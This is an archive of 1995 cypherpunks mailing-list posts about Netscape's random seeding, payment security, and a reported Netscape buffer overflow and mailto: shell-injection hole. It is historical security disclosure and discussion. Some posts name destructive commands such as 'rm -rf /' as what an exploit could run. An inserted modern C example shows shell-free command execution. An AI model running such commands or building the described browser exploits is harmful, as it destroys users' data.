> On Thu, 21 Sep 1995 anonymous@freezone.remailer.mindport.net wrote:
> > Robert Herrig
> > Peekskill, N.Y., Sept. 19,1995.
> > 
> > The writer is a systems consultant.
> 
> [For Netscape?]

  No.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Fri, 22 Sep 95 06:27:36 PDT
To: "David J. Bianco" <bianco@itribe.net>
Subject: Re: Cypherpunks Press release
Message-ID: <v03003311ac878dd1ef9a@[129.46.82.94]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:09 am 9/20/95, David J. Bianco wrote:
>On Sep 20, 10:28, Dietrich J. Kappe sent the following to the NSA's mail
>archives:
>> Subject: Cypherpunks Press release
>|| -----BEGIN PGP SIGNED MESSAGE-----
>||
>|| We've seen the word "hacker" kicked around rather arbitrarily in the
>press.
>|| Are we to conclude that the cypherpunks are a bunch of hackers? I think
>its
>|| time for some cypherpunks spin. How about a logo *and* a press release?
>The
>|| press release would give contacts (email, phone, etc.) so that someone
>on
>|| this list would be contacted by journalists when a crypto story breaks.
>||
>|| If we get enough volunteers, we can fax blanket every newspaper,
>station,
>|| and network in the world.
>||
>
>I think it's a great idea, personally.  I think many journalists would like
>to find third party opinions about network security and other cryptography
>issues, but just don't know who to talk to about them.  By making it easy
>for them to find us, we'd be more likely to be consulted for opinions.
[elided]

I think a media contact group is a good idea too, but I think we should
handle it by having a special address <cypherpunks-press@toad.com> that
media people can send to to request information and that it should split
the incoming mail and route it to a group of volunteers who could then
respond. Questions from media people are usually NOT going to be heavily
tech-oriented, and this sort of press list would give the lesser
cryptologists among us, who nevertheless have a significant amount of
knowledge about public policy issues concerning crypto, a chance to be
useful.

BTW, <pgp-help-humans@hks.net> is still operating, and the small group of
knowledgeable cypherpunks there all see the mail that comes in and cc the
list when someone asks a PGP question and gets it answered by one or more
of the volunteers. This would be a good model to expand on, imho. Everyone
learns something, people go away impressed by the quality answers, etc. :)

   dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 03:38:00 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <9509202150.AA08164@toad.com>
Message-ID: <9509221037.AA08096@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore writes:
> In this sense, NSA ought to be *encouraging* Intel and
> IBM and Motorola to put "generate random bits" instructions into
> their instruction sets...

Does Tessera include any form of hardware RNG ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 03:43:58 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: RNG Resource FAQ (was Re: "random" number seeds vs. Netscape)
In-Reply-To: <30609562.15FB@netscape.com>
Message-ID: <9509221043.AA08133@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:
# You might want to read RFC 1750,

Phil Karlton writes:
> Did that. It talks about a lot of the pitfalls. Unfortunately it does not 
> address (nor can it realistically be expected to address) details of what
> to look for on a particular version of an OS running on some particular 
> platform.

Can someone point me to a compilation of such information ?  If not, I'm
definitely interested in starting a Web page to chronicle recommendations
about good, bad, and questionable random and pseudo-random sources for
specific architectures and operating systems. (It could also include
information on special-purpose plug-in hardware RNGs.)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 23:54:35 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <199509212030.NAA05084@infinity.c2.org>
Message-ID: <43tmht$qfe@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509212125.RAA00188@hoopsnake.cjs.net>, cjs@netcom.com (Christopher J. Shaulis) writes:
> And the sad part is that now that they have announced that they are
> dropping their unofficial Linux support, I really want to hurt
> Netscape badly.

  This is news to me.  We have engineers spending valuable time keeping
our linux port running.  If you tell me where you saw this, I will look
into it.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 00:34:29 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <43tosm$qfe@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509220612.CAA11441@clark.net>, rjc@clark.net (Ray Cromwell) writes:
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:

  Thanks for the report.  I will make sure that this is fixed.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 22 Sep 95 07:39:36 PDT
To: perry@piermont.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com>
Message-ID: <199509221434.HAA28036@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The problem is that if you don't produce a (benign) exploit people
> aren't going to take it seriously enough.
> 

	And without an exploit you won't get a t-shirt. (In general,
an exploit is required for a t-shirt to be made & awarded. Exceptions
may be granted, however, depending upon the situation.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 00:53:01 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v01510100ac8821ac2b23@[206.1.161.4]>
Message-ID: <43tpv8$rom@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  OK, Perry was right, and it was wrong of me to argue with him based
only on the code that I have personally seen.  As we have already
determined, I have not reviewed every line of code in netscape.

  Not that I want to divert attention away from netscape(OK, maybe I
do :-) ), but does this bug exist in any other common browser?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 22 Sep 95 05:03:52 PDT
To: cypherpunks@toad.com
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <v02120d0aac8853dc6923@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Historical example time...

>(0) Alice invents a snaffleblort.
     Some Other Guy invented telephone
>(1) Bob invents a snaffleblort.
     A.G. Bell invented telephone.
>(2) Bob files for a patent on a snaffleblort.
     A.G. Bell files 6 hours earlier.

Actually happened. We know what happened...


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 08:15:47 PDT
To: cwe@Csli.Stanford.EDU
Subject: Re: Exchange random numbers (was: Re: netscape's response)
Message-ID: <9509221511.AA19305@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> This isn't a problem as I see it, he'll only know what bits he
> flipped, not the actual state.

Wouldn't even know that if you permuted it.  You _could_ use a fixed
permutation, or you could use input information from another source
to select the permutation.  Even something as simple as taking 5 bits
from one source and using another source mod(random seed length) to
decide where to xor it into the random seed.  (Rotating back to the 
front if needed, or you could let the bits fall off the end.) And if
all you ever give out to randomness partners is the result of a good
hash there's no way they could ever determine anything from it, or
determine what effect their contribution had.  Shoot, they wouldn't
know if their contribution went into the seed, or merely affected
how someone else's contribution went into the seed.

Patrick

   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 08:23:07 PDT
To: perry@piermont.com
Subject: Re: Seeds which depend on machine states
Message-ID: <9509221519.AA19310@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Miguel Diaz writes:
> > It is my suspicion that seeds which depend on machine 
> > states(ie state of your computer at a specific instance of 
> > time) would always be subject to scrutiny and de-cryption.
> > As long as the software used to encrypt is not self-modifying, 
> > the machine state can (through careful manipulation involving 
> > temperature, clocks, processes etc)always be replicated and 
> > fixed to an acceptable degree.
> 
> Try getting a human to type with the same timing, to microsecond
> precision, the same way twice.
> 
That assumes that you have some way of measuring the timing to microsecond
precision.  On most machines I've been on, if you get something time-
stamped, even if there is a microsecond portion of the timestamp it's
meaningless because it wasn't based on a timer with the required precision.
If a timer can only resolve milliseconds, the microseconds don't have any
meaning.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:25:00 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <199509221224.IAA03734@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray;

This is evidence that, as I said, they have plenty of buffer overflow
bugs. So much for the protestations to the contrary.

My suspicion is that if you used a customized HTTPd that allowed you
to shove arbitrary data into your URL, you could get the victim's copy
of netscape to fandango on the stack and do nicely arbitrary things to
the victim -- like executing "cd ~/; rm -rf ."

A "Hack Netscape" T-Shirt for the first person (Ray, here is your
chance!) to find an exploit using this! Though your demo shouldn't do
anything bad. Does everyone think Ray should get a shirt no matter what?

Perry

Ray Cromwell writes:
> 
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:
> 
> <a href="http://foo.bar.foo[rest of giant URL elided]
> 
> On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
> fault and subsequent coredump. GDB reports nothing useable (stripped
> executable)
> 
> As you can see, I just chose an extremely long domain name. I guessed
> that the authors of netscape probably thought something like "well,
> a buffer size of 256 characters is good enough to hold any domain"
> 
> It's definitely the domain that's causing it, and not the length of
> the URL or the data after the domain name.
>  
> I also tried to overflow some netscape servers using similar techniques
> (and shell metacharacters in all sorts of URLs), to no avail. I suspect
> a similar attack may work against the Netscape Server if it is proxying.
> 
> 
> Does anyone have a disassembly of Netscape, or more specifically, 
> a disassembly of the URL parse and domain lookup routines? I'd be
> happy to collaborate and "Hack Netscape" ;-)
> 
> 
> Happy Hacking,
> -Ray
>  
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 22 Sep 95 05:29:28 PDT
To: jirib@cs.monash.edu.au
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping)
In-Reply-To: <199509220137.LAA12354@sweeney.cs.monash.edu.au>
Message-ID: <UkMehqWMc50e0Eb0xP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.fv: 22-Sep-95 Re: first virtual "security.. Jiri
Baum@sweeney.cs.mon (1560*)

> > >financial insecurity never was a problem as
> > >long as it remains under a small %.
> > 
> > This is an amazing statement, Laurent.

> It's not an amazing statement. As long as the cost of insecurity is
> less than cost of security, there's no problem.

I think the basic confusion here is precisely about the cost.

The cost of having one credit card stolen is small.

The cost of having millions stolen at once is *astronomical*.  It really
could bring down the whole credit card system, if that was the
criminal's goal.

My concern is about schemes in which the compromise of the cryptographic
algorithms or software leads to a scenario in which one criminal steals
millions of credit cards.  In such a scenario, the cost of insecurity is
unacceptably high.

> Okay, so what's stopping you from starting right now with PGP?
> You could simply have that as an alternative to the current system
> (on a per-ID basis, ie new customers specify PGP or not).

> Quite a few people both have PGP and would think well of you if you
> started using it.

> How about "The safest Internet payment system just got safer."?

We're definitely moving in this direction.  It's more complicated than
you make it sound, though.  Personally, I don't want to use any
cryptography without an explicit, clear, policy and mechanism for key
expiration and key lifetimes.  The risk of key compromise is directly
proportional to the key lifetime.  PGP today -- which we use very
heavily internal to FV -- is not well-equipped for dealing with key
management issues on a scale of millions of users.

Now, having said that...  we're currently planning to deploy FV version
2 before the end of the year.  Version 2 *will* include the first use of
PGP in the FV system, but it will NOT work the way you probably expect. 
Stay tuned!  -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:27:02 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Netscape bug update
In-Reply-To: <199509220626.CAB16453@clark.net>
Message-ID: <199509221226.IAA03742@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I've decided that I'll pay Sameer for the shirt for Ray,
regardless.

However, if someone else produces the exploit first, they should get
one, too!

.pm

Ray Cromwell writes:
> 
>   I just verified in GDB using a stack trace that the Netscape overflow
> bug I mentioned is indeed a static stack buffer overflow. It trashes
> the stack.
> 
>   What this means is that in theory, it is possible to get a simple
> URL, if clicked on, to execute some code on someone's browser.
> 
>   Now the hard work begins...
> 
> 
> Happy Hacking,
> -Ray
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Fri, 22 Sep 95 05:30:10 PDT
To: Ray Cromwell <cypherpunks@toad.com
Subject: Re: Netscape bug update
In-Reply-To: <199509220626.CAB16453@clark.net>
Message-ID: <199509221227.IAA22985@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 22,  2:26, Ray Cromwell sent the following to the NSA's mail
archives:
> Subject: Netscape bug update
||
||   I just verified in GDB using a stack trace that the Netscape overflow
|| bug I mentioned is indeed a static stack buffer overflow. It trashes
|| the stack.
||
||   What this means is that in theory, it is possible to get a simple
|| URL, if clicked on, to execute some code on someone's browser.
||
||   Now the hard work begins...
||

This is a new feature of Netscape 2.0, part of the Java package
I believe... ;-)

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 08:35:52 PDT
To: perry@piermont.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <9509221532.AA19315@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Nor is there anything inherently wrong with having sex without the use
> of a condom.

YES!  Safe exec!  Use software protection;)  (Can you tell that when I read
this I was LOL!?)

> 
> However, it is very difficult -- VERY DIFFICULT -- to prove to
> yourself that there is never an instance in which your system() or
> popen() can be abused.

Well...you can tell by looking, certainly that's not true when you need
a condom;)

>                         In any case, I find it's often more prudent just
> to strip all these things out of my code. If you don't use them, you
> don't have to prove they are done properly. Paranoia is your
> friend. No one can ever break you for doing something you don't do.

That's true, I have to admit that I usually don't use them either.  Once
you know how they're coded up, and how little code is actually used, it
seems silly anyway to call a popen or system and suffer the overhead of
the function calls and the loss of control.

> 
> > The problem arises when you use information given to you from
> > outside as the argument to popen or system without checking it.
> 
> Yup, but often, you'd be surprised what turns out to be outside data.

You're singing to the choir.  Sigh, Eric Allman's been several times
surprised about what turned out to be outside data.

> 
> In any case, you obviously also understand why this is bad, but I hope
> that people out there understand -- always make sure that you are
> double extra careful about the use of such calls.

Thanks:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/
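
What doing without system() and popen() looks like in practice, as an added example (not code from anyone in this thread): a pipe, fork and execvp that hand outside data to the program as one argument, so no shell ever parses it. run_capture, passes_literally and missing_program_status are illustrative names, the input string is constructed, and a printf utility on PATH is assumed.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Run argv[0] (looked up on PATH) with argv as its argument vector and
 * capture up to outlen-1 bytes of its stdout. No /bin/sh is involved, so
 * characters such as ; | & ` $ in an argument are just bytes.
 * Returns the child's exit status, 127 if exec failed, -1 on error.
 */
int run_capture(char *const argv[], char *out, size_t outlen)
{
    int fd[2], status;
    size_t used = 0;
    ssize_t n;
    char junk[256];
    pid_t pid;

    if (outlen == 0 || pipe(fd) < 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(fd[0]);
        close(fd[1]);
        return -1;
    }
    if (pid == 0) {                        /* child: stdout becomes the pipe */
        close(fd[0]);
        if (fd[1] != STDOUT_FILENO) {
            if (dup2(fd[1], STDOUT_FILENO) < 0)
                _exit(127);
            close(fd[1]);
        }
        execvp(argv[0], argv);             /* argv reaches the program untouched */
        _exit(127);                        /* only reached if exec failed */
    }
    close(fd[1]);
    for (;;) {                             /* keep what fits, drain the rest */
        int full = used >= outlen - 1;
        n = read(fd[0], full ? junk : out + used,
                 full ? sizeof junk : outlen - 1 - used);
        if (n > 0) {
            if (!full)
                used += (size_t)n;
        } else if (n == 0 || errno != EINTR) {
            break;
        }
    }
    out[used] = '\0';
    close(fd[0]);
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Returns 1 if the outside string comes back byte for byte, i.e. nothing in it ran. */
int passes_literally(const char *untrusted)
{
    char out[512];
    char *argv[4];

    argv[0] = "printf";
    argv[1] = "%s";                        /* fixed format; data is only an argument */
    argv[2] = (char *)untrusted;
    argv[3] = NULL;
    return run_capture(argv, out, sizeof out) == 0 && strcmp(out, untrusted) == 0;
}

/* Exit status seen when the program does not exist (expected: 127). */
int missing_program_status(void)
{
    char out[8];
    char *argv[2];

    argv[0] = "no-such-program-example";
    argv[1] = NULL;
    return run_capture(argv, out, sizeof out);
}

int main(void)
{
    /* Constructed "outside data" full of shell metacharacters. */
    const char *addr = "a@example.invalid; echo INJECTED | cat `date` $(id)";

    printf("literal pass-through: %d\n", passes_literally(addr));
    printf("missing program:      %d\n", missing_program_status());
    return 0;
}
```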




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:36:15 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220715.DAA27920@clark.net>
Message-ID: <199509221236.IAA03762@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
> THIS IS A SERIOUS BUG!
[...]
> [I hear Perry in the background groaning and muttering "I told you so"]

Of course I told you so. I knew what I was saying when I mentioned
buffer overflows being a big problem in code written by the NCSA team,
most of whom went over to Netscape. When at NCSA, they showed very
little capacity to learn this lesson no matter how many cracks
occurred. They always just tried to kludge around the thing instead of
fixing it. When I write security oriented code, I outright ban the use
of certain C library calls.

> These buffer overflow bugs should be taught in every programming
> 101 course along with fencepost errors.
> 
> I'm not even sure if I want to write the obligatory program to exploit
> the hack given that some malicious jerk would probably use it
> on his home page to attack people.

The problem is that if you don't produce a (benign) exploit people
aren't going to take it seriously enough.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:43:45 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <199509221243.IAA03781@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
>   OK, Perry was right, and it was wrong of me to argue with him based
> only on the code that I have personally seen.  As we have already
> determined, I have not reviewed every line of code in netscape.
> 
>   Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?

Probably in Mosaic, though not necessarily in the same place. It's a
case of the same programmers making the same mistakes over and over
again.

I don't believe the Sun Java stuff would suffer from it, although I
fear Java a great deal.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:48:01 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <199509221247.IAA03798@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



It's hardly surprising to me. Look at the link list on any dynamically
linked version of netscape and you'll see lots of calls that look very
suspicious.

I keep telling people this sort of thing and no one at Netscape
listens, although I believe that we may have made a couple of converts
in the firm now.

Perry

Ray Cromwell writes:
> > 
> > On the bright side, mailto: hyperlinks containing extra-long domain names
> > seem to be handled comparatively safely in both Netscape and Mosaic. 
> > (Perhaps they just have longer buffers ? ;)
> 
>   Good question. My guess is, Netscape doesn't do any processing on the
> mailto: hyperlink at all, but merely passes it to a real mail delivery
> agent like Sendmail (or it uses MAPI under Win'95). Which begs
> the question, if Netscape is executing an external delivery agent,
> there may be the possibility of sneaking an attack in there and getting
> the shell to execute something.
> 
> Hmm, let me try something.
> 
> 
> WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
> this before! Try a page with the following URL
> 
>  test 
> 
> Muahaha! Yet another security hole! Clicking on this mailto brings up
> an xterm on my machine!  Simply change the xterm& to "rm -rf /" and
> bingo!
> 
> 
> Sheesh. I better stop before I am on Netscape's most hated list.
> 
> 
> -Ray
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:57:45 PDT
To: jim@acm.org
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <199509221110.EAA03110@mycroft.rand.org>
Message-ID: <199509221257.IAA03853@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly writes:
> > futplex@pseudonym.com (Futplex) writes:
> > Does Tessera include any form of hardware RNG ?
> 
> Yes.  Here's a released CAPSTONE spec sheet.

That probably means that this sort of thing *can* be made cost
effective on ordinary chips. Now we have to get Tim to lobby Intel to
put RNGs on the P7 chip :-)

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 09:07:49 PDT
To: perry@piermont.com
Subject: Executing code on the stack, was Re: netscape bug
Message-ID: <9509221604.AA19341@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> very big, and you can do what you like. The 8lgm people wrote a demo
> for Sparc as a proof of concept.

It's worth mentioning that 8lgm (Eight little green men;) has recently
changed their policy on how long they wait to make exploit scripts available.
It has resonance with what's happened here on cypherpunks lately.  They
used to publish that there was a hole, but would hold up quite a while
on making the exploit scripts available.  They were trying to make it
safer for manufacturers and give them time to make fixes available first.
What actually happened is that manufacturers would put the fixes on the
backburner, and often not get around to them at all.  8lgm found that
publishing the exploit scripts usually resulted in quick fixes from the
vendors.  Now the exploitation details are available quite quickly.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 09:14:15 PDT
To: rjc@clark.net
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <9509221610.AA19346@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> [I hear Perry in the background groaning and muttering "I told you so"]
> These buffer overflow bugs should be taught in every programming
> 101 course along with fencepost errors.
> 
> I'm not even sure if I want to write the obligatory program to exploit
> the hack given that some malicious jerk would probably use it
> on his home page to attack people.
> 
You should consider that there are people with a lot of expertise that are
constantly on the lookout for things like this.  I would bet a nickel to
a donut that many people in the cracker community discovered this a long
time ago and that exploit code was written long ago.  How many people 
logged in as root use netscape?

If the source was available we'd have told them about this long ago.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 02:22:41 PDT
To: cypherpunks@toad.com
Subject: Re: Mosaic Bug (same as Netscape bug) (was Re: Another Netscape Bug)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <43tv6v$t7v@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509220801.AA06875@cs.umass.edu>, futplex@pseudonym.com (Futplex) writes:
> Now, the question is, does Netscape use _the same code_ that was used in
> Mosaic for this purpose ?

  Absolutely not.  There is not a single line of Mosaic code in our product.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 22 Sep 95 06:23:41 PDT
To: cypherpunks@toad.com
Subject: e$: Non-Repudiation
Message-ID: <v02120d00ac8339d1a3bb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Dr. May said:

>the
>"ontology" of digital money, the instruments and forms it can take, are
>_impoverished_ compared to the real world.

Ah... Someone's playing my song...

Sorry I took so long, but I wanted to give this excellent post some serious
attention, which is hard to come by when you're a person like me (praise
the lord and pass the Ritalin ;-) ).

>In my eight years of following digital cash work, I've been struck with how
>little _economics_ enters the fray.

I think you're right, Tim.  More and more people are finally realizing that
digital commerce *is* cryptography: cryptography as it's applied to
economics on a network of microprocessors.  After all, Netscape plans to
make its money on servers, most important, its commerce servers, the
servers that require the most cryptography.

A major leader on this front, to my mind -- that is, someone who has been
barking on the end of his chain ;-) the longest and loudest about all this,
and who has gone out and *learned* how the clearing of transactions happens
in the capital markets and elsewhere -- is Eric Hughes. Eric, who, along
with Tim May, founded this group to begin with, who has worked with David
Chaum, and who designed and built the first anonymous remailers.  One of
the reasons we don't see much of Eric around here these days is because
he's out there putting some rubber to the road in his consulting business,
where he's focusing on the very issue of cryptography and its applications
to digital commerce, and I wish him well.

That is *not* to slight others in this group who are also thinking about
this stuff. Not at all. In addition, most of us are looking at other issues
in cryptography, like remailers, like keeping the state out of our face,
like pithing SSL, and, frankly, most of the rest of us are too busy making
a living to do anything but lurk here.  Cryptography is huge, and digital
commerce is a small conceptual subset of the whole field, no matter how
